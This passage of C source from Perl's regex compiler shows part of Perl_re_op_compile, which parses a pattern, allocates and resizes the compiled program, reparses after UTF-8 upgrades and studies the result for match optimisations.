* Now, an initial crude guess as to the size needed is made, based on the
* length of the pattern. Patches welcome to improve that guess. That amount
* of space is malloc'd and then immediately freed, and then clawed back node
* by node. This design is to minimze, to the extent possible, memory churn
* when doing the the reallocs.
*
* A separate parentheses counting pass may be needed in some cases.
* (Previously the sizing pass did this.) Patches welcome to reduce the number
* of these cases.
*
* The existence of a sizing pass necessitated design decisions that are no
* longer needed. There are potential areas of simplification.
*
* Beware that the optimization-preparation code in here knows about some
* of the structure of the compiled regexp. [I'll say.]
*/
REGEXP *
Perl_re_op_compile(pTHX_ SV ** const patternp, int pat_count,
OP *expr, const regexp_engine* eng, REGEXP *old_re,
bool *is_bare_re, const U32 orig_rx_flags, const U32 pm_flags)
{
dVAR;
REGEXP *Rx; /* Capital 'R' means points to a REGEXP */
STRLEN plen;
char *exp;
regnode *scan;
I32 flags;
SSize_t minlen = 0;
U32 rx_flags;
SV *pat;
SV** new_patternp = patternp;
/* these are all flags - maybe they should be turned
* into a single int with different bit masks */
I32 sawlookahead = 0;
I32 sawplus = 0;
I32 sawopen = 0;
I32 sawminmod = 0;
regex_charset initial_charset = get_regex_charset(orig_rx_flags);
bool recompile = 0;
bool runtime_code = 0;
scan_data_t data;
RExC_state_t RExC_state;
RExC_state_t * const pRExC_state = &RExC_state;
#ifdef TRIE_STUDY_OPT
int restudied = 0;
RExC_state_t copyRExC_state;
#endif
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_RE_OP_COMPILE;
DEBUG_r(if (!PL_colorset) reginitcolors());
/* Initialize these here instead of as-needed, as is quick and avoids
* having to test them each time otherwise */
if (! PL_InBitmap) {
#ifdef DEBUGGING
char * dump_len_string;
#endif
/* This is calculated here, because the Perl program that generates the
* static global ones doesn't currently have access to
* NUM_ANYOF_CODE_POINTS */
PL_InBitmap = _new_invlist(2);
PL_InBitmap = _add_range_to_invlist(PL_InBitmap, 0,
NUM_ANYOF_CODE_POINTS - 1);
#ifdef DEBUGGING
dump_len_string = PerlEnv_getenv("PERL_DUMP_RE_MAX_LEN");
if ( ! dump_len_string
|| ! grok_atoUV(dump_len_string, (UV *)&PL_dump_re_max_len, NULL))
{
PL_dump_re_max_len = 60; /* A reasonable default */
}
#endif
}
pRExC_state->warn_text = NULL;
pRExC_state->unlexed_names = NULL;
pRExC_state->code_blocks = NULL;
if (is_bare_re)
*is_bare_re = FALSE;
if (expr && (expr->op_type == OP_LIST ||
(expr->op_type == OP_NULL && expr->op_targ == OP_LIST))) {
/* allocate code_blocks if needed */
OP *o;
int ncode = 0;
for (o = cLISTOPx(expr)->op_first; o; o = OpSIBLING(o))
if (o->op_type == OP_NULL && (o->op_flags & OPf_SPECIAL))
ncode++; /* count of DO blocks */
if (ncode)
pRExC_state->code_blocks = S_alloc_code_blocks(aTHX_ ncode);
}
if (!pat_count) {
/* compile-time pattern with just OP_CONSTs and DO blocks */
int n;
OP *o;
/* find how many CONSTs there are */
assert(expr);
n = 0;
if (expr->op_type == OP_CONST)
n = 1;
else
for (o = cLISTOPx(expr)->op_first; o; o = OpSIBLING(o)) {
if (o->op_type == OP_CONST)
n++;
}
/* fake up an SV array */
assert(!new_patternp);
Newx(new_patternp, n, SV*);
SAVEFREEPV(new_patternp);
pat_count = n;
n = 0;
if (expr->op_type == OP_CONST)
new_patternp[n] = cSVOPx_sv(expr);
else
for (o = cLISTOPx(expr)->op_first; o; o = OpSIBLING(o)) {
if (o->op_type == OP_CONST)
new_patternp[n++] = cSVOPo_sv;
}
}
DEBUG_PARSE_r(Perl_re_printf( aTHX_
"Assembling pattern from %d elements%s\n", pat_count,
orig_rx_flags & RXf_SPLIT ? " for split" : ""));
/* set expr to the first arg op */
if (pRExC_state->code_blocks && pRExC_state->code_blocks->count
&& expr->op_type != OP_CONST)
{
expr = cLISTOPx(expr)->op_first;
assert( expr->op_type == OP_PUSHMARK
|| (expr->op_type == OP_NULL && expr->op_targ == OP_PUSHMARK)
|| expr->op_type == OP_PADRANGE);
expr = OpSIBLING(expr);
}
pat = S_concat_pat(aTHX_ pRExC_state, NULL, new_patternp, pat_count,
expr, &recompile, NULL);
/* handle bare (possibly after overloading) regex: foo =~ $re */
{
SV *re = pat;
if (SvROK(re))
re = SvRV(re);
if (SvTYPE(re) == SVt_REGEXP) {
if (is_bare_re)
*is_bare_re = TRUE;
SvREFCNT_inc(re);
DEBUG_PARSE_r(Perl_re_printf( aTHX_
"Precompiled pattern%s\n",
orig_rx_flags & RXf_SPLIT ? " for split" : ""));
return (REGEXP*)re;
}
}
exp = SvPV_nomg(pat, plen);
if (!eng->op_comp) {
if ((SvUTF8(pat) && IN_BYTES)
|| SvGMAGICAL(pat) || SvAMAGIC(pat))
{
/* make a temporary copy; either to convert to bytes,
* or to avoid repeating get-magic / overloaded stringify */
pat = newSVpvn_flags(exp, plen, SVs_TEMP |
(IN_BYTES ? 0 : SvUTF8(pat)));
}
return CALLREGCOMP_ENG(eng, pat, orig_rx_flags);
}
/* ignore the utf8ness if the pattern is 0 length */
RExC_utf8 = RExC_orig_utf8 = (plen == 0 || IN_BYTES) ? 0 : SvUTF8(pat);
RExC_uni_semantics = 0;
RExC_contains_locale = 0;
RExC_strict = cBOOL(pm_flags & RXf_PMf_STRICT);
RExC_in_script_run = 0;
RExC_study_started = 0;
pRExC_state->runtime_code_qr = NULL;
RExC_frame_head= NULL;
RExC_frame_last= NULL;
RExC_frame_count= 0;
RExC_latest_warn_offset = 0;
RExC_use_BRANCHJ = 0;
RExC_total_parens = 0;
RExC_open_parens = NULL;
RExC_close_parens = NULL;
RExC_paren_names = NULL;
RExC_size = 0;
RExC_seen_d_op = FALSE;
#ifdef DEBUGGING
RExC_paren_name_list = NULL;
#endif
DEBUG_r({
RExC_mysv1= sv_newmortal();
RExC_mysv2= sv_newmortal();
});
DEBUG_COMPILE_r({
SV *dsv= sv_newmortal();
RE_PV_QUOTED_DECL(s, RExC_utf8, dsv, exp, plen, PL_dump_re_max_len);
Perl_re_printf( aTHX_ "%sCompiling REx%s %s\n",
PL_colors[4], PL_colors[5], s);
});
/* we jump here if we have to recompile, e.g., from upgrading the pattern
* to utf8 */
if ((pm_flags & PMf_USE_RE_EVAL)
/* this second condition covers the non-regex literal case,
* i.e. $foo =~ '(?{})'. */
|| (IN_PERL_COMPILETIME && (PL_hints & HINT_RE_EVAL))
)
runtime_code = S_has_runtime_code(aTHX_ pRExC_state, exp, plen);
redo_parse:
/* return old regex if pattern hasn't changed */
/* XXX: note in the below we have to check the flags as well as the
* pattern.
*
* Things get a touch tricky as we have to compare the utf8 flag
* independently from the compile flags. */
if ( old_re
&& !recompile
&& !!RX_UTF8(old_re) == !!RExC_utf8
&& ( RX_COMPFLAGS(old_re) == ( orig_rx_flags & RXf_PMf_FLAGCOPYMASK ) )
&& RX_PRECOMP(old_re)
&& RX_PRELEN(old_re) == plen
&& memEQ(RX_PRECOMP(old_re), exp, plen)
&& !runtime_code /* with runtime code, always recompile */ )
{
return old_re;
}
/* Allocate the pattern's SV */
RExC_rx_sv = Rx = (REGEXP*) newSV_type(SVt_REGEXP);
RExC_rx = ReANY(Rx);
if ( RExC_rx == NULL )
FAIL("Regexp out of space");
rx_flags = orig_rx_flags;
if ( (UTF || RExC_uni_semantics)
&& initial_charset == REGEX_DEPENDS_CHARSET)
{
/* Set to use unicode semantics if the pattern is in utf8 and has the
* 'depends' charset specified, as it means unicode when utf8 */
set_regex_charset(&rx_flags, REGEX_UNICODE_CHARSET);
RExC_uni_semantics = 1;
}
RExC_pm_flags = pm_flags;
if (runtime_code) {
assert(TAINTING_get || !TAINT_get);
if (TAINT_get)
Perl_croak(aTHX_ "Eval-group in insecure regular expression");
if (!S_compile_runtime_code(aTHX_ pRExC_state, exp, plen)) {
/* whoops, we have a non-utf8 pattern, whilst run-time code
* got compiled as utf8. Try again with a utf8 pattern */
S_pat_upgrade_to_utf8(aTHX_ pRExC_state, &exp, &plen,
pRExC_state->code_blocks ? pRExC_state->code_blocks->count : 0);
goto redo_parse;
}
}
assert(!pRExC_state->runtime_code_qr);
RExC_sawback = 0;
RExC_seen = 0;
RExC_maxlen = 0;
RExC_in_lookbehind = 0;
RExC_seen_zerolen = *exp == '^' ? -1 : 0;
#ifdef EBCDIC
RExC_recode_x_to_native = 0;
#endif
RExC_in_multi_char_class = 0;
RExC_start = RExC_copy_start_in_constructed = RExC_copy_start_in_input = RExC_precomp = exp;
RExC_precomp_end = RExC_end = exp + plen;
RExC_nestroot = 0;
RExC_whilem_seen = 0;
RExC_end_op = NULL;
RExC_recurse = NULL;
RExC_study_chunk_recursed = NULL;
RExC_study_chunk_recursed_bytes= 0;
RExC_recurse_count = 0;
pRExC_state->code_index = 0;
/* Initialize the string in the compiled pattern. This is so that there is
* something to output if necessary */
set_regex_pv(pRExC_state, Rx);
DEBUG_PARSE_r({
Perl_re_printf( aTHX_
"Starting parse and generation\n");
RExC_lastnum=0;
RExC_lastparse=NULL;
});
/* Allocate space and zero-initialize. Note, the two step process
of zeroing when in debug mode, thus anything assigned has to
happen after that */
if (! RExC_size) {
/* On the first pass of the parse, we guess how big this will be. Then
* we grow in one operation to that amount and then give it back. As
* we go along, we re-allocate what we need.
*
* XXX Currently the guess is essentially that the pattern will be an
* EXACT node with one byte input, one byte output. This is crude, and
* better heuristics are welcome.
*
* On any subsequent passes, we guess what we actually computed in the
* latest earlier pass. Such a pass probably didn't complete so is
* missing stuff. We could improve those guesses by knowing where the
* parse stopped, and use the length so far plus apply the above
* assumption to what's left. */
RExC_size = STR_SZ(RExC_end - RExC_start);
}
Newxc(RExC_rxi, sizeof(regexp_internal) + RExC_size, char, regexp_internal);
if ( RExC_rxi == NULL )
FAIL("Regexp out of space");
Zero(RExC_rxi, sizeof(regexp_internal) + RExC_size, char);
RXi_SET( RExC_rx, RExC_rxi );
/* We start from 0 (over from 0 in the case this is a reparse. The first
* node parsed will give back any excess memory we have allocated so far).
* */
RExC_size = 0;
/* non-zero initialization begins here */
RExC_rx->engine= eng;
RExC_rx->extflags = rx_flags;
RXp_COMPFLAGS(RExC_rx) = orig_rx_flags & RXf_PMf_FLAGCOPYMASK;
if (pm_flags & PMf_IS_QR) {
RExC_rxi->code_blocks = pRExC_state->code_blocks;
if (RExC_rxi->code_blocks) {
RExC_rxi->code_blocks->refcnt++;
}
}
RExC_rx->intflags = 0;
RExC_flags = rx_flags; /* don't let top level (?i) bleed */
RExC_parse = exp;
/* This NUL is guaranteed because the pattern comes from an SV*, and the sv
* code makes sure the final byte is an uncounted NUL. But should this
* ever not be the case, lots of things could read beyond the end of the
* buffer: loops like
* while(isFOO(*RExC_parse)) RExC_parse++;
* strchr(RExC_parse, "foo");
* etc. So it is worth noting. */
assert(*RExC_end == '\0');
RExC_naughty = 0;
RExC_npar = 1;
RExC_parens_buf_size = 0;
RExC_emit_start = RExC_rxi->program;
pRExC_state->code_index = 0;
*((char*) RExC_emit_start) = (char) REG_MAGIC;
RExC_emit = 1;
/* Do the parse */
if (reg(pRExC_state, 0, &flags, 1)) {
/* Success!, But we may need to redo the parse knowing how many parens
* there actually are */
if (IN_PARENS_PASS) {
flags |= RESTART_PARSE;
}
/* We have that number in RExC_npar */
RExC_total_parens = RExC_npar;
}
else if (! MUST_RESTART(flags)) {
ReREFCNT_dec(Rx);
Perl_croak(aTHX_ "panic: reg returned failure to re_op_compile, flags=%#" UVxf, (UV) flags);
}
/* Here, we either have success, or we have to redo the parse for some reason */
if (MUST_RESTART(flags)) {
/* It's possible to write a regexp in ascii that represents Unicode
codepoints outside of the byte range, such as via \x{100}. If we
detect such a sequence we have to convert the entire pattern to utf8
and then recompile, as our sizing calculation will have been based
on 1 byte == 1 character, but we will need to use utf8 to encode
at least some part of the pattern, and therefore must convert the whole
thing.
-- dmq */
if (flags & NEED_UTF8) {
/* We have stored the offset of the final warning output so far.
* That must be adjusted. Any variant characters between the start
* of the pattern and this warning count for 2 bytes in the final,
* so just add them again */
if (UNLIKELY(RExC_latest_warn_offset > 0)) {
RExC_latest_warn_offset +=
variant_under_utf8_count((U8 *) exp, (U8 *) exp
+ RExC_latest_warn_offset);
}
S_pat_upgrade_to_utf8(aTHX_ pRExC_state, &exp, &plen,
pRExC_state->code_blocks ? pRExC_state->code_blocks->count : 0);
DEBUG_PARSE_r(Perl_re_printf( aTHX_ "Need to redo parse after upgrade\n"));
}
else {
DEBUG_PARSE_r(Perl_re_printf( aTHX_ "Need to redo parse\n"));
}
if (ALL_PARENS_COUNTED) {
/* Make enough room for all the known parens, and zero it */
Renew(RExC_open_parens, RExC_total_parens, regnode_offset);
Zero(RExC_open_parens, RExC_total_parens, regnode_offset);
RExC_open_parens[0] = 1; /* +1 for REG_MAGIC */
Renew(RExC_close_parens, RExC_total_parens, regnode_offset);
Zero(RExC_close_parens, RExC_total_parens, regnode_offset);
}
else { /* Parse did not complete. Reinitialize the parentheses
structures */
RExC_total_parens = 0;
if (RExC_open_parens) {
Safefree(RExC_open_parens);
RExC_open_parens = NULL;
}
if (RExC_close_parens) {
Safefree(RExC_close_parens);
RExC_close_parens = NULL;
}
}
/* Clean up what we did in this parse */
SvREFCNT_dec_NN(RExC_rx_sv);
goto redo_parse;
}
/* Here, we have successfully parsed and generated the pattern's program
* for the regex engine. We are ready to finish things up and look for
* optimizations. */
/* Update the string to compile, with correct modifiers, etc */
set_regex_pv(pRExC_state, Rx);
RExC_rx->nparens = RExC_total_parens - 1;
/* Uses the upper 4 bits of the FLAGS field, so keep within that size */
if (RExC_whilem_seen > 15)
RExC_whilem_seen = 15;
DEBUG_PARSE_r({
Perl_re_printf( aTHX_
"Required size %" IVdf " nodes\n", (IV)RExC_size);
RExC_lastnum=0;
RExC_lastparse=NULL;
});
#ifdef RE_TRACK_PATTERN_OFFSETS
DEBUG_OFFSETS_r(Perl_re_printf( aTHX_
"%s %" UVuf " bytes for offset annotations.\n",
RExC_offsets ? "Got" : "Couldn't get",
(UV)((RExC_offsets[0] * 2 + 1))));
DEBUG_OFFSETS_r(if (RExC_offsets) {
const STRLEN len = RExC_offsets[0];
STRLEN i;
GET_RE_DEBUG_FLAGS_DECL;
Perl_re_printf( aTHX_
"Offsets: [%" UVuf "]\n\t", (UV)RExC_offsets[0]);
for (i = 1; i <= len; i++) {
if (RExC_offsets[i*2-1] || RExC_offsets[i*2])
Perl_re_printf( aTHX_ "%" UVuf ":%" UVuf "[%" UVuf "] ",
(UV)i, (UV)RExC_offsets[i*2-1], (UV)RExC_offsets[i*2]);
}
Perl_re_printf( aTHX_ "\n");
});
#else
SetProgLen(RExC_rxi,RExC_size);
#endif
DEBUG_OPTIMISE_r(
Perl_re_printf( aTHX_ "Starting post parse optimization\n");
);
/* XXXX To minimize changes to RE engine we always allocate
3-units-long substrs field. */
Newx(RExC_rx->substrs, 1, struct reg_substr_data);
if (RExC_recurse_count) {
Newx(RExC_recurse, RExC_recurse_count, regnode *);
SAVEFREEPV(RExC_recurse);
}
if (RExC_seen & REG_RECURSE_SEEN) {
/* Note, RExC_total_parens is 1 + the number of parens in a pattern.
* So its 1 if there are no parens. */
RExC_study_chunk_recursed_bytes= (RExC_total_parens >> 3) +
((RExC_total_parens & 0x07) != 0);
Newx(RExC_study_chunk_recursed,
RExC_study_chunk_recursed_bytes * RExC_total_parens, U8);
SAVEFREEPV(RExC_study_chunk_recursed);
}
reStudy:
RExC_rx->minlen = minlen = sawlookahead = sawplus = sawopen = sawminmod = 0;
DEBUG_r(
RExC_study_chunk_recursed_count= 0;
);
Zero(RExC_rx->substrs, 1, struct reg_substr_data);
if (RExC_study_chunk_recursed) {
Zero(RExC_study_chunk_recursed,
RExC_study_chunk_recursed_bytes * RExC_total_parens, U8);
}
#ifdef TRIE_STUDY_OPT
if (!restudied) {
StructCopy(&zero_scan_data, &data, scan_data_t);
copyRExC_state = RExC_state;
} else {
U32 seen=RExC_seen;
DEBUG_OPTIMISE_r(Perl_re_printf( aTHX_ "Restudying\n"));
RExC_state = copyRExC_state;
if (seen & REG_TOP_LEVEL_BRANCHES_SEEN)
RExC_seen |= REG_TOP_LEVEL_BRANCHES_SEEN;
else
RExC_seen &= ~REG_TOP_LEVEL_BRANCHES_SEEN;
StructCopy(&zero_scan_data, &data, scan_data_t);
}
#else
StructCopy(&zero_scan_data, &data, scan_data_t);
#endif
/* Dig out information for optimizations. */
RExC_rx->extflags = RExC_flags; /* was pm_op */
/*dmq: removed as part of de-PMOP: pm->op_pmflags = RExC_flags; */
if (UTF)
SvUTF8_on(Rx); /* Unicode in it? */
RExC_rxi->regstclass = NULL;
if (RExC_naughty >= TOO_NAUGHTY) /* Probably an expensive pattern. */
RExC_rx->intflags |= PREGf_NAUGHTY;
scan = RExC_rxi->program + 1; /* First BRANCH. */
/* testing for BRANCH here tells us whether there is "must appear"
data in the pattern. If there is then we can use it for optimisations */
if (!(RExC_seen & REG_TOP_LEVEL_BRANCHES_SEEN)) { /* Only one top-level choice.
*/
SSize_t fake;
STRLEN longest_length[2];
regnode_ssc ch_class; /* pointed to by data */
int stclass_flag;
SSize_t last_close = 0; /* pointed to by data */
regnode *first= scan;
regnode *first_next= regnext(first);
int i;
/*
* Skip introductions and multiplicators >= 1
* so that we can extract the 'meat' of the pattern that must
* match in the large if() sequence following.
* NOTE that EXACT is NOT covered here, as it is normally
* picked up by the optimiser separately.
*
* This is unfortunate as the optimiser isnt handling lookahead
* properly currently.
*
*/
while ((OP(first) == OPEN && (sawopen = 1)) ||
/* An OR of *one* alternative - should not happen now. */
(OP(first) == BRANCH && OP(first_next) != BRANCH) ||
/* for now we can't handle lookbehind IFMATCH*/
(OP(first) == IFMATCH && !first->flags && (sawlookahead = 1)) ||
(OP(first) == PLUS) ||
(OP(first) == MINMOD) ||
/* An {n,m} with n>0 */
(PL_regkind[OP(first)] == CURLY && ARG1(first) > 0) ||
(OP(first) == NOTHING && PL_regkind[OP(first_next)] != END ))
{
/*
* the only op that could be a regnode is PLUS, all the rest
* will be regnode_1 or regnode_2.
*
* (yves doesn't think this is true)
*/
if (OP(first) == PLUS)
sawplus = 1;
else {
if (OP(first) == MINMOD)
sawminmod = 1;
first += regarglen[OP(first)];
}
first = NEXTOPER(first);
first_next= regnext(first);
}
/* Starting-point info. */
again:
DEBUG_PEEP("first:", first, 0, 0);
/* Ignore EXACT as we deal with it later. */
if (PL_regkind[OP(first)] == EXACT) {
if ( OP(first) == EXACT
|| OP(first) == EXACT_ONLY8
|| OP(first) == EXACTL)
{
NOOP; /* Empty, get anchored substr later. */
}
else
RExC_rxi->regstclass = first;
}
#ifdef TRIE_STCLASS
else if (PL_regkind[OP(first)] == TRIE &&
((reg_trie_data *)RExC_rxi->data->data[ ARG(first) ])->minlen>0)
{
/* this can happen only on restudy */
RExC_rxi->regstclass = construct_ahocorasick_from_trie(pRExC_state, (regnode *)first, 0);
}
#endif
else if (REGNODE_SIMPLE(OP(first)))
RExC_rxi->regstclass = first;
else if (PL_regkind[OP(first)] == BOUND ||
PL_regkind[OP(first)] == NBOUND)
RExC_rxi->regstclass = first;
else if (PL_regkind[OP(first)] == BOL) {
RExC_rx->intflags |= (OP(first) == MBOL
? PREGf_ANCH_MBOL
: PREGf_ANCH_SBOL);
first = NEXTOPER(first);
goto again;
}
else if (OP(first) == GPOS) {
RExC_rx->intflags |= PREGf_ANCH_GPOS;
first = NEXTOPER(first);
goto again;
}
else if ((!sawopen || !RExC_sawback) &&
!sawlookahead &&
(OP(first) == STAR &&
PL_regkind[OP(NEXTOPER(first))] == REG_ANY) &&
!(RExC_rx->intflags & PREGf_ANCH) && !pRExC_state->code_blocks)
{
/* turn .* into ^.* with an implied $*=1 */
const int type =
(OP(NEXTOPER(first)) == REG_ANY)
? PREGf_ANCH_MBOL
: PREGf_ANCH_SBOL;
RExC_rx->intflags |= (type | PREGf_IMPLICIT);
first = NEXTOPER(first);
goto again;
}
if (sawplus && !sawminmod && !sawlookahead
&& (!sawopen || !RExC_sawback)
&& !pRExC_state->code_blocks) /* May examine pos and $& */
/* x+ must match at the 1st pos of run of x's */
RExC_rx->intflags |= PREGf_SKIP;
/* Scan is after the zeroth branch, first is atomic matcher. */
#ifdef TRIE_STUDY_OPT
DEBUG_PARSE_r(
if (!restudied)
Perl_re_printf( aTHX_ "first at %" IVdf "\n",
(IV)(first - scan + 1))
);
#else
DEBUG_PARSE_r(
Perl_re_printf( aTHX_ "first at %" IVdf "\n",
(IV)(first - scan + 1))
);
#endif
/*
* If there's something expensive in the r.e., find the
* longest literal string that must appear and make it the
* regmust. Resolve ties in favor of later strings, since
* the regstart check works with the beginning of the r.e.
* and avoiding duplication strengthens checking. Not a
* strong reason, but sufficient in the absence of others.
* [Now we resolve ties in favor of the earlier string if
* it happens that c_offset_min has been invalidated, since the
* earlier string may buy us something the later one won't.]
*/
data.substrs[0].str = newSVpvs("");
data.substrs[1].str = newSVpvs("");
data.last_found = newSVpvs("");
data.cur_is_floating = 0; /* initially any found substring is fixed */
ENTER_with_name("study_chunk");
SAVEFREESV(data.substrs[0].str);
SAVEFREESV(data.substrs[1].str);
SAVEFREESV(data.last_found);
first = scan;
if (!RExC_rxi->regstclass) {
ssc_init(pRExC_state, &ch_class);
data.start_class = &ch_class;
stclass_flag = SCF_DO_STCLASS_AND;
} else /* XXXX Check for BOUND? */
stclass_flag = 0;
data.last_closep = &last_close;
DEBUG_RExC_seen();
/*
* MAIN ENTRY FOR study_chunk() FOR m/PATTERN/
* (NO top level branches)
*/
minlen = study_chunk(pRExC_state, &first, &minlen, &fake,
scan + RExC_size, /* Up to end */
&data, -1, 0, NULL,
SCF_DO_SUBSTR | SCF_WHILEM_VISITED_POS | stclass_flag
| (restudied ? SCF_TRIE_DOING_RESTUDY : 0),
0);
CHECK_RESTUDY_GOTO_butfirst(LEAVE_with_name("study_chunk"));
if ( RExC_total_parens == 1 && !data.cur_is_floating
&& data.last_start_min == 0 && data.last_end > 0
&& !RExC_seen_zerolen
&& !(RExC_seen & REG_VERBARG_SEEN)
&& !(RExC_seen & REG_GPOS_SEEN)
){
RExC_rx->extflags |= RXf_CHECK_ALL;
}
scan_commit(pRExC_state, &data,&minlen, 0);
/* XXX this is done in reverse order because that's the way the
* code was before it was parameterised. Don't know whether it
* actually needs doing in reverse order. DAPM */
for (i = 1; i >= 0; i--) {
longest_length[i] = CHR_SVLEN(data.substrs[i].str);
if ( !( i
&& SvCUR(data.substrs[0].str) /* ok to leave SvCUR */
&& data.substrs[0].min_offset
== data.substrs[1].min_offset
&& SvCUR(data.substrs[0].str)
== SvCUR(data.substrs[1].str)
)
&& S_setup_longest (aTHX_ pRExC_state,
&(RExC_rx->substrs->data[i]),
&(data.substrs[i]),
longest_length[i]))
{
RExC_rx->substrs->data[i].min_offset =
data.substrs[i].min_offset - data.substrs[i].lookbehind;
RExC_rx->substrs->data[i].max_offset = data.substrs[i].max_offset;
/* Don't offset infinity */
if (data.substrs[i].max_offset < SSize_t_MAX)
RExC_rx->substrs->data[i].max_offset -= data.substrs[i].lookbehind;
SvREFCNT_inc_simple_void_NN(data.substrs[i].str);
}
else {
RExC_rx->substrs->data[i].substr = NULL;
RExC_rx->substrs->data[i].utf8_substr = NULL;
longest_length[i] = 0;
}
}
LEAVE_with_name("study_chunk");
if (RExC_rxi->regstclass
&& (OP(RExC_rxi->regstclass) == REG_ANY || OP(RExC_rxi->regstclass) == SANY))
RExC_rxi->regstclass = NULL;
if ((!(RExC_rx->substrs->data[0].substr || RExC_rx->substrs->data[0].utf8_substr)
|| RExC_rx->substrs->data[0].min_offset)
&& stclass_flag
&& ! (ANYOF_FLAGS(data.start_class) & SSC_MATCHES_EMPTY_STRING)
&& is_ssc_worth_it(pRExC_state, data.start_class))
{
const U32 n = add_data(pRExC_state, STR_WITH_LEN("f"));
ssc_finalize(pRExC_state, data.start_class);
Newx(RExC_rxi->data->data[n], 1, regnode_ssc);
StructCopy(data.start_class,
(regnode_ssc*)RExC_rxi->data->data[n],
regnode_ssc);
RExC_rxi->regstclass = (regnode*)RExC_rxi->data->data[n];
RExC_rx->intflags &= ~PREGf_SKIP; /* Used in find_byclass(). */
DEBUG_COMPILE_r({ SV *sv = sv_newmortal();
regprop(RExC_rx, sv, (regnode*)data.start_class, NULL, pRExC_state);
Perl_re_printf( aTHX_
"synthetic stclass \"%s\".\n",
SvPVX_const(sv));});
data.start_class = NULL;
}
/* A temporary algorithm prefers floated substr to fixed one of
* same length to dig more info. */
i = (longest_length[0] <= longest_length[1]);
RExC_rx->substrs->check_ix = i;
RExC_rx->check_end_shift = RExC_rx->substrs->data[i].end_shift;
RExC_rx->check_substr = RExC_rx->substrs->data[i].substr;
RExC_rx->check_utf8 = RExC_rx->substrs->data[i].utf8_substr;
RExC_rx->check_offset_min = RExC_rx->substrs->data[i].min_offset;
RExC_rx->check_offset_max = RExC_rx->substrs->data[i].max_offset;
if (!i && (RExC_rx->intflags & (PREGf_ANCH_SBOL|PREGf_ANCH_GPOS)))
RExC_rx->intflags |= PREGf_NOSCAN;
if ((RExC_rx->check_substr || RExC_rx->check_utf8) ) {
RExC_rx->extflags |= RXf_USE_INTUIT;
if (SvTAIL(RExC_rx->check_substr ? RExC_rx->check_substr : RExC_rx->check_utf8))
RExC_rx->extflags |= RXf_INTUIT_TAIL;
}
/* XXX Unneeded? dmq (shouldn't as this is handled elsewhere)
if ( (STRLEN)minlen < longest_length[1] )
minlen= longest_length[1];
if ( (STRLEN)minlen < longest_length[0] )
minlen= longest_length[0];
*/
}
else {
/* Several toplevels. Best we can is to set minlen. */
SSize_t fake;
regnode_ssc ch_class;
SSize_t last_close = 0;
DEBUG_PARSE_r(Perl_re_printf( aTHX_ "\nMulti Top Level\n"));
scan = RExC_rxi->program + 1;
ssc_init(pRExC_state, &ch_class);
data.start_class = &ch_class;
data.last_closep = &last_close;
DEBUG_RExC_seen();
/*
* MAIN ENTRY FOR study_chunk() FOR m/P1|P2|.../
* (patterns WITH top level branches)
*/
minlen = study_chunk(pRExC_state,
&scan, &minlen, &fake, scan + RExC_size, &data, -1, 0, NULL,
SCF_DO_STCLASS_AND|SCF_WHILEM_VISITED_POS|(restudied
? SCF_TRIE_DOING_RESTUDY
: 0),
0);
CHECK_RESTUDY_GOTO_butfirst(NOOP);
RExC_rx->check_substr = NULL;
RExC_rx->check_utf8 = NULL;
RExC_rx->substrs->data[0].substr = NULL;
RExC_rx->substrs->data[0].utf8_substr = NULL;
RExC_rx->substrs->data[1].substr = NULL;
RExC_rx->substrs->data[1].utf8_substr = NULL;
if (! (ANYOF_FLAGS(data.start_class) & SSC_MATCHES_EMPTY_STRING)
&& is_ssc_worth_it(pRExC_state, data.start_class))
{
const U32 n = add_data(pRExC_state, STR_WITH_LEN("f"));
ssc_finalize(pRExC_state, data.start_class);
Newx(RExC_rxi->data->data[n], 1, regnode_ssc);
StructCopy(data.start_class,
(regnode_ssc*)RExC_rxi->data->data[n],
regnode_ssc);
RExC_rxi->regstclass = (regnode*)RExC_rxi->data->data[n];
RExC_rx->intflags &= ~PREGf_SKIP; /* Used in find_byclass(). */
DEBUG_COMPILE_r({ SV* sv = sv_newmortal();
regprop(RExC_rx, sv, (regnode*)data.start_class, NULL, pRExC_state);
Perl_re_printf( aTHX_
"synthetic stclass \"%s\".\n",
SvPVX_const(sv));});
data.start_class = NULL;
}
}
if (RExC_seen & REG_UNBOUNDED_QUANTIFIER_SEEN) {
RExC_rx->extflags |= RXf_UNBOUNDED_QUANTIFIER_SEEN;
RExC_rx->maxlen = REG_INFTY;
}
else {
RExC_rx->maxlen = RExC_maxlen;
}
/* Guard against an embedded (?=) or (?<=) with a longer minlen than
the "real" pattern. */
DEBUG_OPTIMISE_r({
Perl_re_printf( aTHX_ "minlen: %" IVdf " RExC_rx->minlen:%" IVdf " maxlen:%" IVdf "\n",
(IV)minlen, (IV)RExC_rx->minlen, (IV)RExC_maxlen);
});
RExC_rx->minlenret = minlen;
if (RExC_rx->minlen < minlen)
RExC_rx->minlen = minlen;
if (RExC_seen & REG_RECURSE_SEEN ) {
RExC_rx->intflags |= PREGf_RECURSE_SEEN;
Newx(RExC_rx->recurse_locinput, RExC_rx->nparens + 1, char *);
}
if (RExC_seen & REG_GPOS_SEEN)
RExC_rx->intflags |= PREGf_GPOS_SEEN;
if (RExC_seen & REG_LOOKBEHIND_SEEN)
RExC_rx->extflags |= RXf_NO_INPLACE_SUBST; /* inplace might break the
lookbehind */
if (pRExC_state->code_blocks)
RExC_rx->extflags |= RXf_EVAL_SEEN;
if (RExC_seen & REG_VERBARG_SEEN)
{
RExC_rx->intflags |= PREGf_VERBARG_SEEN;
RExC_rx->extflags |= RXf_NO_INPLACE_SUBST; /* don't understand this! Yves */
}
if (RExC_seen & REG_CUTGROUP_SEEN)
RExC_rx->intflags |= PREGf_CUTGROUP_SEEN;
if (pm_flags & PMf_USE_RE_EVAL)
RExC_rx->intflags |= PREGf_USE_RE_EVAL;
if (RExC_paren_names)
RXp_PAREN_NAMES(RExC_rx) = MUTABLE_HV(SvREFCNT_inc(RExC_paren_names));
else
RXp_PAREN_NAMES(RExC_rx) = NULL;
/* If we have seen an anchor in our pattern then we set the extflag RXf_IS_ANCHORED
* so it can be used in pp.c */
if (RExC_rx->intflags & PREGf_ANCH)
RExC_rx->extflags |= RXf_IS_ANCHORED;
{
/* this is used to identify "special" patterns that might result
* in Perl NOT calling the regex engine and instead doing the match "itself",
* particularly special cases in split//. By having the regex compiler
* do this pattern matching at a regop level (instead of by inspecting the pattern)
* we avoid weird issues with equivalent patterns resulting in different behavior,
* AND we allow non Perl engines to get the same optimizations by the setting the
* flags appropriately - Yves */
regnode *first = RExC_rxi->program + 1;
U8 fop = OP(first);
regnode *next = regnext(first);
U8 nop = OP(next);
